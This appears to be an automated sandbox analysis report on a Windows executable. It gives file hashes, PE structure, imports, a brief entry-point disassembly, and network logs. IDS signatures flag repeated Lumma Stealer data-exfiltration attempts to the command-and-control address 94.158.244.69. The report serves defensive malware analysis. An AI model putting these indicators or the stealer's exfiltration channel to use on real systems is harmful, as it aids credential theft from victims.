                                                          SSDEEP:192:BqC930XdBNuOY1gOqYC+uFHnqN4jg+BN+jpL9ZtMB26HuxXwcH:wtBsn13qYQVNg+BwnZtXScbH
                                                          MD5:5A69E2632B4C3BBFA623FA146A139227
                                                          SHA1:98AF46487192CD0DE47D3864211C96C4113591B6
                                                          SHA-256:6E607531C774F4C3B73379410FD8B2D729EB3844CAE8B8A2F5C88D022943EB10
                                                          SHA-512:3526DC1A10DD21CF4DDF9BE310B06FA8267C7A62F088249935A9602C6A000E0ABD4D0CA86E29B6A092A0835C7C69D9108D7F72939995E13F46FE31FFC3B5226C
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... ........w4g............4...............H.......<...........d...."..........`.......8...........T............B...n..........L...........8...............................................................................eJ..............GenuineIntel............T.......l....w4gL............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8336
                                                          Entropy (8bit):3.7038887496042485
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJE/6d6YWKSUWgmfq9fpDM89bjKsffBm:R6lXJM6d6YrSUWgmfq9zjpfU
                                                          MD5:C6309F6A225FA91FC12B0BEE776EE29E
                                                          SHA1:35DD836645402CE1824BA95B7082873430E3F9BC
                                                          SHA-256:01A1BEF51184B677975CDDE96513B8AFE07FC1A9E4B2D186FDC85F75BDACA93A
                                                          SHA-512:AE6A51B0DB6316734542F12D9BD7D5C68A6FBCF3B2074905CF90AF419F19752285E299E9330612534B3FD7F3E113D5938E53B41FD2516BEBE4CD9FD9C812E254
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.7.6.<./.P.i.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4579
                                                          Entropy (8bit):4.48270615743993
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsSJg77aI98vWpW8VYEoYm8M4JX8wtdHF4S+q8R5YlG+wzZzydd:uIjfgI7C+7VbFJHzGzRydd
                                                          MD5:F0E8C9AAD8CE4C31651E36CC0D33A012
                                                          SHA1:CBBB93F9F54B7AC827E8EA1FAC47278E49948818
                                                          SHA-256:87CB48C49B777295B1B1EB1D7790BE3D12DF6D4F5B4EF642531A1F56F013ABD2
                                                          SHA-512:0265071D83ACEE7F7EBA2664D4445691DC96D4F53E7F742C096E13F827768ECE1A790C54333E5A01016ABE144BE6914A6EB809BEE89BB10C6FD32C76E5987945
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586139" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:MS Windows registry file, NT/2000 or above
                                                          Category:dropped
                                                          Size (bytes):1835008
                                                          Entropy (8bit):4.295972036756898
                                                          Encrypted:false
                                                          SSDEEP:6144:n41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+sFmBMZJh1VjE:41/YCW2AoQ0Ni+FwMHrVA
                                                          MD5:9CE968BB610646FC4A480E70813159CC
                                                          SHA1:283331690BBFF6FD46E4D91F7F87CD69040C4B4C
                                                          SHA-256:AA54832F9A1D038AB4906ABB0E4A077FB8DBC885AAC929375A9BE7439872FAC7
                                                          SHA-512:2B8FEBC43966706D26286F970D0DF528E745E5F9C659B99BEF156370A8BFE072F4B85EF71A7A4812FC88650B422E2577890D3831E0FA9BDB8949C2A881D57F4F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.y.N.5...............................................................................................................................................................................................................................................................................................................................................F.z........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.361069620731758
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:I5jG2Os8GA.exe
                                                          File size:427'008 bytes
                                                          MD5:e90e793f59c0a6a60182c3f3a597ff0c
                                                          SHA1:6b9f2bf982e071bfd9b4b371e581993ed3ef8a7c
                                                          SHA256:1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919
                                                          SHA512:cb92c7e556a660dfd80e8ee24b5d87f49e81a9becd1a43a9bd4fd3a6ecefb78fd63e8c9e758e70a0e4cafc47fde414226c72b37327d5e9fb1be0d853b3106343
                                                          SSDEEP:6144:miluHCPKxEpYgvubVAyyWUMHtp3edt11tbxFHdTcSahAkjJM:miluHCCxo8bVAynn3+1F2Sae
                                                          TLSH:9C94F131FEB2E0B1D6B784749C70DAA46A7FB9355B3041CB236426AE5E713D18923336
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Ta..Ta..Ta......Ta......Ta......Ta......Ta..T`..Ta......Ta......Ta......Ta.Rich.Ta.........PE..L.....vb.................X.
                                                          Icon Hash:5951494d25514d09
                                                          Entrypoint:0x4062d2
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6276B10E [Sat May 7 17:49:02 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:0
                                                          File Version Major:5
                                                          File Version Minor:0
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:0
                                                          Import Hash:5ec79de09577cae96a73fdfa1335a279
                                                          Instruction
                                                          call 00007F667CD6241Eh
                                                          jmp 00007F667CD5CE2Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [esp+04h]
                                                          test ecx, 00000003h
                                                          je 00007F667CD5CFD6h
                                                          mov al, byte ptr [ecx]
                                                          add ecx, 01h
                                                          test al, al
                                                          je 00007F667CD5D000h
                                                          test ecx, 00000003h
                                                          jne 00007F667CD5CFA1h
                                                          add eax, 00000000h
                                                          lea esp, dword ptr [esp+00000000h]
                                                          lea esp, dword ptr [esp+00000000h]
                                                          mov eax, dword ptr [ecx]
                                                          mov edx, 7EFEFEFFh
                                                          add edx, eax
                                                          xor eax, FFFFFFFFh
                                                          xor eax, edx
                                                          add ecx, 04h
                                                          test eax, 81010100h
                                                          je 00007F667CD5CF9Ah
                                                          mov eax, dword ptr [ecx-04h]
                                                          test al, al
                                                          je 00007F667CD5CFE4h
                                                          test ah, ah
                                                          je 00007F667CD5CFD6h
                                                          test eax, 00FF0000h
                                                          je 00007F667CD5CFC5h
                                                          test eax, FF000000h
                                                          je 00007F667CD5CFB4h
                                                          jmp 00007F667CD5CF7Fh
                                                          lea eax, dword ptr [ecx-01h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-02h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-03h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          lea eax, dword ptr [ecx-04h]
                                                          mov ecx, dword ptr [esp+04h]
                                                          sub eax, ecx
                                                          ret
                                                          mov edi, edi
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 20h
                                                          mov eax, dword ptr [ebp+08h]
                                                          push esi
                                                          push edi
                                                          push 00000008h
                                                          pop ecx
                                                          mov esi, 004012A0h
                                                          lea edi, dword ptr [ebp-20h]
                                                          rep movsd
                                                          mov dword ptr [ebp-08h], eax
                                                          mov eax, dword ptr [ebp+0Ch]
                                                          pop edi
                                                          mov dword ptr [ebp-04h], eax
                                                          pop esi
                                                          test eax, eax
                                                          je 00007F667CD5CFBEh
                                                          test byte ptr [eax], 00000008h
                                                          je 00007F667CD5CFB9h
                                                          Programming Language:
                                                          • [ASM] VS2008 build 21022
                                                          • [ C ] VS2008 build 21022
                                                          • [C++] VS2008 build 21022
                                                          • [IMP] VS2005 build 50727
                                                          • [RES] VS2008 build 21022
                                                          • [LNK] VS2008 build 21022
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x55d100x50.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x21820000x77e0.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x218a0000xd24.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4a280x40.text
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x556ea0x55800ffce9689455faccfdbc759346aa1e3d4False0.9025493421052632data7.870139503393558IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .data0x570000x212a8000x1a003a612eabb5281976c0c1689ef494de10unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x21820000x77e00x78006a3eb980d90decd5283d2a1224802694False0.47356770833333334data4.710889244235017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x218a0000x95400x96007f7fb4059126abf5e4529e919a636d20False0.0784375data0.9789795267574816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          FESACUBULOVITUTAGIJOMUF0x21875880x719ASCII text, with very long lines (1817), with no line terminators0.6092460099064392
                                                          RT_ICON0x21823300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.35954157782515994
                                                          RT_ICON0x21831d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4711191335740072
                                                          RT_ICON0x2183a800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.4646265560165975
                                                          RT_ICON0x21860280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.47068480300187615
                                                          RT_ICON0x21870d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.4973404255319149
                                                          RT_STRING0x2187ee00x5b2data0.443758573388203
                                                          RT_STRING0x21884980x7e6data0.4228486646884273
                                                          RT_STRING0x2188c800x40adata0.46518375241779497
                                                          RT_STRING0x21890900x182data0.5284974093264249
                                                          RT_STRING0x21892180x5c6data0.44113667117726657
                                                          RT_GROUP_ICON0x21875380x4cdata0.75
                                                          RT_VERSION0x2187ca80x238data0.5404929577464789
                                                          DLLImport
                                                          KERNEL32.dllWaitForSingleObject, InterlockedCompareExchange, AddConsoleAliasW, GetModuleHandleW, GetConsoleAliasesA, IsBadReadPtr, GetNumberFormatA, FindResourceExA, GlobalAlloc, AddRefActCtx, GetLocaleInfoW, GetCalendarInfoW, FreeConsole, CreateEventA, FindNextVolumeW, ReplaceFileW, GetModuleFileNameW, DeactivateActCtx, GetLogicalDriveStringsA, OpenMutexW, GetLastError, GetConsoleAliasesLengthW, GetProcAddress, AttachConsole, VirtualAlloc, CreateTimerQueueTimer, VirtualAllocEx, LoadLibraryA, InterlockedExchangeAdd, GetConsoleScreenBufferInfo, WritePrivateProfileStringA, FindFirstVolumeMountPointW, GetCurrentConsoleFont, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, GetCommTimeouts, GetCurrentThreadId, GetVersionExA, FindAtomW, DebugBreak, ReadConsoleOutputCharacterW, OpenFileMappingA, WritePrivateProfileStructA, CreateMutexW, GetCurrentDirectoryW, GetDateFormatW, HeapFree, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetStdHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA
                                                          USER32.dllRegisterClassW, CharLowerBuffA
                                                          GDI32.dllGetBkMode, GetCharABCWidthsFloatA, GetCharWidthW
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-13T10:53:29.772818+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104997994.158.244.6980TCP
                                                          2024-11-13T10:54:17.003790+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.1049759TCP
                                                          2024-11-13T10:54:30.179436+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104979994.158.244.6980TCP
                                                          2024-11-13T10:54:39.654677+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104985494.158.244.6980TCP
                                                          2024-11-13T10:54:48.777818+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104990594.158.244.6980TCP
                                                          2024-11-13T10:54:54.605405+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.1049975TCP
                                                          2024-11-13T10:54:57.784098+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104995194.158.244.6980TCP
                                                          2024-11-13T10:55:06.773949+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104997894.158.244.6980TCP
                                                          2024-11-13T10:55:24.717528+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998094.158.244.6980TCP
                                                          2024-11-13T10:55:25.421751+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998194.158.244.6980TCP
                                                          2024-11-13T10:55:25.421751+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.104998194.158.244.6980TCP
                                                          2024-11-13T10:55:42.661653+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998294.158.244.6980TCP
                                                          2024-11-13T10:55:51.436285+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998394.158.244.6980TCP
                                                          2024-11-13T10:56:00.595324+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998494.158.244.6980TCP
                                                          2024-11-13T10:56:09.361497+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998594.158.244.6980TCP
                                                          2024-11-13T10:56:18.125634+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998694.158.244.6980TCP
                                                          2024-11-13T10:56:26.916302+01002043206ET MALWARE Win32/Lumma Stealer Data Exfiltration Attempt M21192.168.2.104998794.158.244.6980TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 13, 2024 10:54:21.681684017 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.686779976 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.686881065 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.687001944 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.691559076 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.691833019 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.691967010 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.696554899 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696624041 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.696667910 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696681023 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696691036 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696727037 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:21.696731091 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696753025 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696772099 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696780920 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696789980 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.696935892 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.701517105 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.701606035 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.701735973 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:21.701745987 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:30.179368019 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:30.179435968 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:30.179884911 CET4979980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:30.184715033 CET804979994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.157649994 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.162811995 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.162892103 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.163049936 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.163846016 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.168021917 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168071032 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.168873072 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168886900 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168900013 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168920040 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.168925047 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168937922 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168946028 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:31.168950081 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168973923 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168986082 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.168998003 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.173136950 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174298048 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174693108 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174705982 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174720049 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174730062 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:31.174753904 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:39.654582024 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:39.654676914 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:39.654726028 CET4985480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:39.659699917 CET804985494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:40.266330004 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:40.271373987 CET804990594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:40.271452904 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:40.271759987 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:40.272409916 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:40.276890993 CET804990594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:40.277163029 CET804990594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:48.777607918 CET804990594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:48.777817965 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:48.777896881 CET4990580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:48.787507057 CET804990594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:49.308927059 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:49.313826084 CET804995194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:49.313918114 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:49.314127922 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:49.314604998 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:49.318944931 CET804995194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:49.319433928 CET804995194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:57.784009933 CET804995194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:57.784097910 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:57.863679886 CET4995180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:57.868710995 CET804995194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:58.281083107 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:58.286353111 CET804997894.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:58.286451101 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:58.286600113 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:58.286981106 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:54:58.291416883 CET804997894.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:54:58.291788101 CET804997894.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:06.773852110 CET804997894.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:06.773948908 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:06.782624006 CET4997880192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:06.787552118 CET804997894.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.281929970 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.287153959 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.287261009 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.287374973 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.287792921 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.292403936 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292486906 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.292663097 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292725086 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.292730093 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292762041 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292793989 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.292795897 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292809963 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.292829990 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.292850018 CET4997980192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:07.293121099 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.293150902 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.293179035 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297266960 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297322035 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297702074 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297804117 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297832966 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297873974 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.297924042 CET804997994.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:07.319921970 CET4997980192.168.2.1094.158.244.69
